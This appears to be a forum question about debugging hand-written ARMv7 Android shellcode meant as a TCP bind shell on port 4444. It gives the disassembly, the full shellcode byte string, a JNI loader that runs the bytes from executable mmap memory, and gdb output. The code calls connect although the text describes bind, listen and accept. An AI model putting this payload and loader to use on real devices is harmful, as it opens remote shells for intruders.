My following armv7 tcp bind shell code steps:
- opens socket
- listen at port 4444
- accept connections
- bind stdin/out/err to socket using
dup2 - spawns shell using
execve( "/system/bin/sh", NULL, NULL )
Disassembly of section .text:
_start e28f3001 add r3, pc, #1 ; switch to thumb mode
_start+0x4 e12fff13 bx r3
// socket(2, 1, 0)
_start+0x8 2002 movs r0, #2
_start+0xa 2101 movs r1, #1
_start+0xc 1a92 subs r2, r2, r2
_start+0xe 27c8 movs r7, #200
_start+0x10 3751 adds r7, #81 ; r7 = 281 (socket)
_start+0x12 df01 svc 1 ; r0 = resultant sockfd
_start+0x14 1c04 adds r4, r0, #0 ; save sockfd in r4
// connect(r0, &sockaddr, 16)
_start+0x16 a10a add r1, pc, #40 ; (adr r1, struct)
_start+0x18 704a strb r2, [r1, #1] ; write 0 for AF_INET
_start+0x1a 2210 movs r2, #16
_start+0x1c 3702 adds r7, #2 ; r7 = 283 (connect)
_start+0x1e df01 svc 1
// dup2(sockfd, 0)
_start+0x20 273f movs r7, #63 ; r7 = 63 (dup2)
_start+0x22 1c20 adds r0, r4, #0 ; r4 is the saved sockfd
_start+0x24 1a49 subs r1, r1, r1 ; r1 = 0 (stdin)
_start+0x26 df01 svc 1
// dup2(sockfd, 1)
_start+0x28 1c20 adds r0, r4, #0
_start+0x2a 2101 movs r1, #1
_start+0x2c df01 svc 1
// dup2(sockfd, 2)
_start+0x2e 1c20 adds r0, r4, #0
_start+0x30 2102 movs r1, #2
_start+0x32 df01 svc 1
// execve("/system/bin/sh", 0, 0)
_start+0x34 a004 add r0, pc, #16 ; (adr r0, binsh)
_start+0x36 1a92 subs r2, r2, r2
_start+0x38 1a49 subs r1, r1, r1
_start+0x3a 7382 strb r2, [r0, #14]
_start+0x3c 270b movs r7, #11
_start+0x3e df01 svc 1
// struct:
// .ascii "\x02\xff" // AF_INET 0xff will be NULLed
// .ascii "\x11\x5c" // port 4444
// .byte 0,0,0,0 // IP Address (accept any?)
struct 5c11ff02 .word 0x5c11ff02
struct+0x4 00000000 .word 0x00000000
// .ascii "/system/bin/shX"
binsh 7379732f .word 0x7379732f
binsh+0x4 2f6d6574 .word 0x2f6d6574
binsh+0x8 2f6e6962 .word 0x2f6e6962
binsh+0xc 6873 .short 0x6873
binsh+0xe 58 .byte 0x58
Executed via JNI
char SC[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0a\xa1\x4a\x70\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x21\x01\xdf\x20\x1c\x02\x21\x01\xdf\x04\xa0\x92\x1a\x49\x1a\x82\x73\x0b\x27\x01\xdf\x02\xff\x11\x5c\x00\x00\x00\x00\x2f\x73\x79\x73\x74\x65\x6d\x2f\x62\x69\x6e\x2f\x73\x68\x58\x00";
JNIEXPORT jstring JNICALL Java_com_MainActivity_run(JNIEnv *env, jobject obj) {
char* code = mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy(code, SC, 300);
void (*func)() = (void (*)())code;
func();
return (*env)->NewStringUTF(env, "hello");
}
The mmap is used to set execute permissions to the shellcode.
In the MainActivity#onCreate I execute the native function run.
Debugging using gdb (v7.1) I see the shellcode.
gdb $ x/10i $pc => 0xb402a05c: svc 1 0xb402a05e: nop ; (mov r8, r8) gdb $ n process 8467 is executing new program: /system/bin/sh Reading /system/bin/sh from remote target... Reading /system/bin/sh from remote target... Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
I'm trying to connect from my localhost using netcat and connection refused because there is no open port.
Executing cat /proc/net/tcp shows that.
Executing ps shows new process with "/system/bin/sh" in zombie state.
root@androidv7:/ # ps | grep 8467 u0_a298 8467 2002 0 0 c002a898 00000000 Z sh
Do I need to replace my exec syscall with fork, exec & getpid ?
Any help ?
References:
